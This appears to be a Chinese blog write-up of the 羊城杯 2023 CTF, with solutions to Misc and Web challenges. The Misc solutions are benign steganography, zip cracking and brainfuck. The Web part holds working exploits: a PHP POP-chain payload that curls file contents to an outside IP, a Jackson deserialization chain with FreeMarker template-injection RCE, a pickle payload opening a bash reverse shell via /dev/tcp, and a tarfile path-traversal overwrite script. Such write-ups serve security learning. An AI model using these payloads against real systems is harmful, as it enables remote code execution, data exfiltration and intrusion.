羊城杯 2023
本文最后更新于 173 天前,其中的信息可能已经有所发展或是发生改变。

Misc

EZ_misc

  • binwalk 分离得到feld.txt
vzbtrvplnnvphsqkxsiqibroou
  • 根据压缩包名称搜索为Cronsfeld Cipher
    • https://www.boxentriq.com/code-breaking/gronsfeld-cipher
try to think the s nipping tools
  • 老考点了,CVE-2023-28303
    • https://github.com/frankthetank-music/Acropalypse-Multi-Tool
Windows11 的模式

ai 和 nia 的交响曲

  • 从流量中提取 flag1.png flag2.zip
  • flag2.zip 伪加密,0宽,对应曹操盖饭鬼畜视频提出字符
DASCTF{@i_n1a_l0v3S_CAOCAOGAIFAN}

Matryoshka

  • 磁盘镜像,内含rar jpg encrypt,rar 后缀一个 jpg 与 磁盘中图像相同,猜测盲水印
  • encrypt文件 veracrypt 挂载,密码:watermark_is_fun
  • 0宽拿到维吉尼亚密码

程序猿Quby

  • 根据题目描述得到为《死亡之链》夏多密码
HAVEANICEDAY
  • png 加密 LSB,得到 rar 解压密码
  • 得到两个esxl表格,给隐藏数据上色得到wav文件deepsound密码
w0wyoudo4goodj0b
  • deepsound 隐藏文件解压,base64换表

Easy_VMDK

  • 以 vmdk 固定开头进行明文攻击
bkcrack.exe -C Easy_VMDK.zip -c flag.vmdk -x 0 4B444D560100000003000000
bkcrack.exe -C Easy_VMDK.zip -c flag.vmdk -k e6a73d9f 21ccfdbc f3e0c61c -d flag.vmdk
  • flag.zip 后缀一个 zip,分离得到 png2txt.py,逆向得到key.png
from base64 import b64decode
from binascii import b2a_uu
from PIL import Image


key = open("key.txt", "r").read().split("\n")
key = [[int(_) for _ in b2a_uu(b64decode(i)).decode().strip().split(', ')] for i in key[:-1]]

file = Image.new("RGB", (2494, 137))
a = 0
for i in range(137):
    for j in range(2494):
        file.putpixel((j, i), tuple(key[a]))
        a += 1
file.save("test.png")
DASCTF{2431a606-00a3-4698-8b0f-eb806a7bb1be}

GIFuck

  • 分离gif,通过hash提取字符
import os
import hashlib

dir_list = os.listdir('1')
result = []
for i in dir_list:
    m = hashlib.md5()
    fp = open('1\\' + i, 'rb')
    data = fp.read()
    m.update(data)
    result.append(m.hexdigest())

flag = ''
sub = 0
for i in result:
    if i == 'a6680292f0fc8a9796121447574de6ec':
        flag += '+'
    elif i == '04b5ae733105563b238777baff564e17':
        flag += '['
    elif i == 'f041b11363a41c0c7e1b755e45d908a3':
        flag += '-'
    elif i == '7514082f25355bc663e015e6d51763af':
        flag += '>'
    elif i == '06df41b1b5eea0485269b7178093d1ff':
        flag += '<'
    elif i == 'd4884cc21151c6e90acc351bf371935b':
        flag += ']'
    elif i == 'a53ffccc32e0aab29201cc8984fa9c7b':
        flag += '.'
    else:
        print(i)
        print(sub)
        break
    sub += 1
print(flag)
++++[->++++<]>[->++++++<]>-[->+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]+++<++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]<+++[->++++<]>[->-<]>[-<<<+>>>]<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]+++<++[->++++<]>[->-<]>[-<<<+>>>]+<++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]<+++<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<++[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]++[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]<<+++++++++[->+++++++++<]>++.<+++++[->+++++<]>+++.+++..+++++++.<+++++++++[->---------<]>--------.<++++++++[->++++++++<]>++.<++++[->++++<]>+++.-.<+++++++++[->---------<]>---.<+++++++++[->+++++++++<]>++++++++.<+++[->---<]>-.++++++.---.<+++++++++[->---------<]>-.<++++++++[->++++++++<]>++++++.++++++.<+++[->---<]>--.++++++.<++++++++[->--------<]>-------.<++++++++[->++++++++<]>+++++++++.<+++[->+++<]>+.<+++++++++[->---------<]>--.<++++++++[->++++++++<]>++++++++++++++.+.+++++.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>++++++++.---.<+++[->+++<]>++++.<+++[->---<]>----.<+++++++[->-------<]>------.[-]<
  • 解密无用

但是看到这串brainfuck输出用的“.”都在末尾,猜测要么是栈里生成了flag值,没有输出,在后面的栈里输出了这个内容,或者是先生成了flag,没有输出,然后把flag的内容改掉了,改成了这个内容。但是看到编码的后半部分有大量的“-”,所以猜测是第二种,应该把flag值改掉了

from cjj✌
CONST_INF = int(1e7+7)

class Table:
    def __init__(self):
        self.register = [0, 0]
        self.ptr = 0

    def table_expand(self):
        if self.ptr == 0:
            self.ptr += len(self.register)
            self.register = [0] * len(self.register) + self.register
        elif self.ptr == len(self.register) - 1:
            self.register = self.register + [0] * len(self.register)
        else:
            pass

    def valid_check(self):
        assert self.ptr >= 0 and self.ptr < len(self.register)

    def ptr_l(self):
        self.table_expand()
        self.ptr -= 1
        self.valid_check()
    
    def ptr_r(self):
        self.table_expand()
        self.ptr += 1
        self.valid_check()

    def add1(self):
        self.valid_check()
        self.register[self.ptr] += 1

    def sub1(self):
        self.valid_check()
        self.register[self.ptr] -= 1

    def set(self, value):
        self.valid_check()
        self.register[self.ptr] = value

    def get(self):
        self.valid_check()
        return self.register[self.ptr]

class Env:
    def __init__(self):
        self.table = Table()

    def process(self, code, inp):
        num_ins, ptr_ins = 0, 0
        ptr_inp = 0
        outp = ""
        text = ""
        while ptr_ins < len(code):
            if code[ptr_ins] == '>':
                #print(chr(self.table.get()),end="")
                text += chr(self.table.get())
                self.table.ptr_l()
                num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
            elif code[ptr_ins] == '<':
                self.table.ptr_r()
                num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
            elif code[ptr_ins] == '+':
                self.table.add1()
                num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
            elif code[ptr_ins] == '-':
                self.table.sub1()
                num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
            elif code[ptr_ins] == '.':
                outp += chr(self.table.get())
                num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
            elif code[ptr_ins] == ',':
                if ptr_inp < len(inp):
                    self.table.set(ord(inp[ptr_inp]))
                    ptr_inp += 1
                else:
                    raise ValueError('Input exhausted')
                num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
            elif code[ptr_ins] == '[':
                if self.table.get() == 0:
                    while ptr_ins < len(code) and code[ptr_ins] != ']':
                        num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
                num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
            elif code[ptr_ins] == ']':
                if self.table.get() != 0:
                    while ptr_ins >= 0 and code[ptr_ins] != '[':
                        num_ins, ptr_ins = num_ins + 1, ptr_ins - 1
                num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
            else:
                num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
            assert num_ins < CONST_INF

        return outp,text
        

if __name__ == '__main__':
    interpreter = Env()

    # hello world
    hello_world_code = '++++[->++++<]>[->++++++<]>-[->+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]+++<++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]<+++[->++++<]>[->-<]>[-<<<+>>>]<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]+++<++[->++++<]>[->-<]>[-<<<+>>>]+<++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]<+++<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<++[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]++[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]<<+++++++++[->+++++++++<]>++.<+++++[->+++++<]>+++.+++..+++++++.<+++++++++[->---------<]>--------.<++++++++[->++++++++<]>++.<++++[->++++<]>+++.-.<+++++++++[->---------<]>---.<+++++++++[->+++++++++<]>++++++++.<+++[->---<]>-.++++++.---.<+++++++++[->---------<]>-.<++++++++[->++++++++<]>++++++.++++++.<+++[->---<]>--.++++++.<++++++++[->--------<]>-------.<++++++++[->++++++++<]>+++++++++.<+++[->+++<]>+.<+++++++++[->---------<]>--.<++++++++[->++++++++<]>++++++++++++++.+.+++++.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>++++++++.---.<+++[->+++<]>++++.<+++[->---<]>----.<+++++++[->-------<]>------.[-]<'
    outp,text = interpreter.process(hello_world_code, None)
    print(outp)
    for i in text.encode().split(b" "):
        data = ""
        for j in i:
            if(j > 32 and j < 127):
                data += chr(j)
        if(len(data) > 0):
            print(data[-1],end="")

#Sorry but your flag is not here.
#?>_DASCTF{Pen_Pineapple_Apple_Pen}
  • 推荐:https://pablojorge.github.io/brainfuck,查看内存的值

Web

D0n’t pl4y g4m3!!!

  • hint.txt
Ö_0 0vO Ow0 0w0 Ö_0 Ö_O Ö.O o_o 0.O OvO o.0 owo o.Ö Ö.Ö Ovo 0_Ö Ö_o owO O.0 owo Ö_o owO O.0 owo Ö_0 0wÖ O.0 0w0 Ö_0 OwO ov0 owo o_O O.Ö Övo 
  • CTF 玩烂梗的题是真多,恶心
  • p0p.php
<?php
header("HTTP/1.1 302 found");
header("Location:https://passer-by.com/pacman/");

class Pro{
    private $exp;
    private $rce2;

    public function __get($name)
    {
        return $this->$rce2=$this->exp[$rce2];
    }
    public  function __toString()
    {
            call_user_func('system', "cat /flag");
     }
}

class Yang
{
    public function __call($name, $ary)
    {
        if ($this->key === true || $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func($this->now[$name], $ary[0]);
            }
        }
    }
    public function ycb()
    {
        $this->now = 0;
        return $this->finish->finish;
    }
    public function __wakeup()
    {
        $this->key = True;
    }
}
class Cheng
{
    private $finish;
    public $name;
    public function __get($value)
    {

        return $this->$value = $this->name[$value];
    }
}
class Bei
{
    public function __destruct()
    {
        if ($this->CTF->ycb()) {
            $this->fine->YCB1($this->rce, $this->rce1);
        }
    }
    public function __wakeup()
    {
        $this->key = false;
    }
}

function prohib($a){
    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";
    return preg_replace($filter,'',$a);
}

$a = $_POST["CTF"];
if (isset($a)){
  unserialize(prohib($a));
}
?>
  • exp

From 0RAYS

<?php
class Yang
{
    public function __call($name, $ary)
    {
        if ($this->key === true || $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func($this->now[$name], $ary[0]);
            }
        }
    }
    public function ycb()
    {
        $this->now = 0;
        return $this->finish->finish;
    }
    public function __wakeup()
    {
        $this->key = True;
    }
}
class Cheng
{
    private $finish;
    public $name;
    public function __construct()
    {
        $this->name['finish']="system";
    }

    public function __get($value)
    {

        return $this->$value = $this->name[$value];
    }
}
class Bei
{
    public function __destruct()
    {
        if ($this->CTF->ycb()) {
            $this->fine->YCB1($this->rce, $this->rce1);
        }
    }
    public function __wakeup()
    {
        $this->key = false;
    }
}

function prohib($a){
    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";
    return preg_replace($filter,'',$a);
}

$test=new Bei();
$test->rce="curl http://124.223.14.29:11037/`cat /tmp/catcatf1ag.txt`";
$test->CTF=new Yang();
$test->CTF->finish=new Cheng();
$test->fine=new Yang();
$test->fine->finish=new Cheng();
$test->fine->now['YCB1']="system";
$test->fine->key=true;

echo urlencode(str_replace("s:6:\"system\";","s:6:\"syssystemtem\";",serialize($test)))
  • 双写绕的时候注意序列化字符串的长度是有变化的,手动改一下

Ez_java

  • ban 了类
  • 分析

然后他又只有springboot,也就是只有jackson的依赖能打,但能直接打的链子ban了。

有关jackson的反序列化网上都能搜到,源自阿里云CTF bypassit那题

jackson这玩意和fastjson一样,也是可以触发任意getter的

所以用jackson链子前半段,toString触发调 HtmlBeangetHtmlMap ,然后动态代理调 get 方法写模板文件覆盖index.ftl 来RCE

然后这里有关动态代理的相关参考CC1那个动态代理就好。就是要触发 HtmlMap 的get方法,但反序列化的时候又没有直接调用,所以利用动态代理,这里执行了get方法

所以利用jackson的链子触发getter方法

调用 put ,进入动态代理的invoke方法执行get写入文件

from 0RAYS-Pankas
  • 调用栈
uploadfile:9, HtmlUploadUtil (com.ycbjava.Utils)
get:39, HtmlMap (com.ycbjava.Utils)
invoke:20, HtmlInvocationHandler (com.ycbjava.Utils)
isEmpty:-1, $Proxy63 (com.sun.proxy)
serializeWithoutTypeInfo:752, MapSerializer (com.fasterxml.jackson.databind.ser.std)
serialize:720, MapSerializer (com.fasterxml.jackson.databind.ser.std)
serialize:35, MapSerializer (com.fasterxml.jackson.databind.ser.std)
serializeAsField:728, BeanPropertyWriter (com.fasterxml.jackson.databind.ser)
serializeFields:774, BeanSerializerBase (com.fasterxml.jackson.databind.ser.std)
serialize:178, BeanSerializer (com.fasterxml.jackson.databind.ser)
defaultSerializeValue:1142, SerializerProvider (com.fasterxml.jackson.databind)
serialize:115, POJONode (com.fasterxml.jackson.databind.node)
serialize:39, SerializableSerializer (com.fasterxml.jackson.databind.ser.std)
serialize:20, SerializableSerializer (com.fasterxml.jackson.databind.ser.std)
_serialize:480, DefaultSerializerProvider (com.fasterxml.jackson.databind.ser)
serializeValue:319, DefaultSerializerProvider (com.fasterxml.jackson.databind.ser)
serialize:1518, ObjectWriter$Prefetch (com.fasterxml.jackson.databind)
_writeValueAndClose:1219, ObjectWriter (com.fasterxml.jackson.databind)
writeValueAsString:1086, ObjectWriter (com.fasterxml.jackson.databind)
nodeToString:30, InternalNodeMapper (com.fasterxml.jackson.databind.node)
toString:62, BaseJsonNode (com.fasterxml.jackson.databind.node)
readObject:86, BadAttributeValueExpException (javax.management)
  • exp

import com.fasterxml.jackson.databind.node.POJONode;
import com.fasterxml.jackson.databind.node.BaseJsonNode;
import com.ycbjava.Bean.HtmlBean;
import com.ycbjava.Utils.HtmlInvocationHandler;
import com.ycbjava.Utils.HtmlMap;
import javassist.*;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.Map;

public class Poc {

    public static void main(String[] args) throws Exception {

//        ClassPool pool = ClassPool.getDefault();
//        //移除 BaseJsonNode 中的 writeReplace 方法
//        CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
//        CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
//        ctClass0.removeMethod(writeReplace);
//        // 将修改后的CtClass加载至当前线程的上下文类加载器中
//        ctClass0.toClass();

        HtmlMap htmlMap = new HtmlMap();
        String filname = "index.ftl";
        String content = "<#assign ac=springMacroRequestContext.webApplicationContext>\n" +
                "  <#assign fc=ac.getBean('freeMarkerConfiguration')>\n" +
                "    <#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n" +
                "      <#assign VOID=fc.setNewBuiltinClassResolver(dcr)>${\"freemarker.template.utility.Execute\"?new()(\"cat /flag\")}";
        setFieldValue(htmlMap, "filename", filname);
        setFieldValue(htmlMap, "content", content);
        HtmlInvocationHandler htmlInvocationHandler = new HtmlInvocationHandler(htmlMap);
        Map map = (Map) Proxy.newProxyInstance(
                HtmlMap.class.getClassLoader(),
                new Class[] {Map.class},
                htmlInvocationHandler);
        HtmlBean htmlBean = new HtmlBean();
        setFieldValue(htmlBean, "HtmlMap", map);

        POJONode jsonNodes = new POJONode(htmlBean);
        BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(exp,jsonNodes);
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
        objectOutputStream.writeObject(exp);
        objectOutputStream.close();
        String res = Base64.getEncoder().encodeToString(barr.toByteArray());
        System.out.println(res);

    }
    private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
        Field f = obj.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(obj, arg);
    }
}
  • freemarker 模板注入
    • https://www.cnblogs.com/escape-w/p/17326592.html

Ez_web

  • cmd.php 执行部分命令,upload.php 上传文件,list.php 列出部分指定目录

猜测文件上传至 /etc/ 目录,因为没法列出

不知道哪队师傅的wp
  • fuzz 之后发现可以上传 so 文件,上传 whoami.so 劫持反弹shell

Serpent

  • app.py
from flask import Flask, session
from secret import secret

@app.route('/verification')
def verification():
    try:
        attribute = session.get('Attribute')
        if not isinstance(attribute, dict):
            raise Exception
    except Exception:
        return 'Hacker!!!'
    if attribute.get('name') == 'admin':
        if attribute.get('admin') == 1:
            return secret
        else:
            return "Don't play tricks on me"
    else:
        return "You are a perfect stranger to me"

if __name__ == '__main__':
    app.run('0.0.0.0', port=80)
  • session 头部解密
python .\flask_session_cookie_manager3.py encode -s "GWHTpkwrEETkPT" -t "{'Attribute': {'admin': 1, 'name': 'admin', 'secret_key': 'GWHTpkwrEETkPT'}}"
  • 伪造 admin
Hello admin, welcome to /ppppppppppick1e
@app.route('/src0de')
def src0de():
    f = open(__file__, 'r')
    rsp = f.read()
    f.close()
    return rsp[rsp.index("@app.route('/src0de')"):]

@app.route('/ppppppppppick1e')
def ppppppppppick1e():
    try:
        username = "admin"
        rsp = make_response("Hello, %s " % username)
        rsp.headers['hint'] = "Source in /src0de"
        pick1e = request.cookies.get('pick1e')
        if pick1e is not None:
            pick1e = base64.b64decode(pick1e)
        else:
            return rsp
        if check(pick1e):
            pick1e = pickle.loads(pick1e)
            return "Go for it!!!"
        else:
            return "No Way!!!"
    except Exception as e:
        error_message = str(e)
        return error_message

    return rsp

class GWHT():
    def __init__(self):
        pass

if __name__ == '__main__':
    app.run('0.0.0.0', port=80)
  • R 过滤绕过
    • https://xz.aliyun.com/t/11807#toc-4
  • Pickle 反序列化
    • https://goodapple.top/archives/1069
# From gtg

b'''(c__main__
GWHT
o}(S"__setstate__"
cos
system
ubS"bash -c 'bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxx 0>&1'"
b.'''
  • python 提权

ArkNights

  • 非预期,直接读/proc/1/environ

ezyaml

  • 上传 tarfile 覆盖 templates/result.html
    • cve-2016-6321
import tarfile
import requests

url = ""
proxy = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}

def changeName(tarinfo):
    # 修改tar包内文件名
    tarinfo.name = f"../../templates/result.html"
    return tarinfo
# 生成tar包
def generateTarFile(filename):
    with tarfile.open("poc.tar", "w") as tar:
        tar.add(filename, filter=changeName)

def upload():
    file = {"file": open("poc.tar", "rb")}
    res = requests.post(url + "/upload", files=file, proxies=proxy)
    print(res.text)

if __name__ == "__main__":
    requests.get(url)
    generateTarFile("poc.html")
    upload()

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇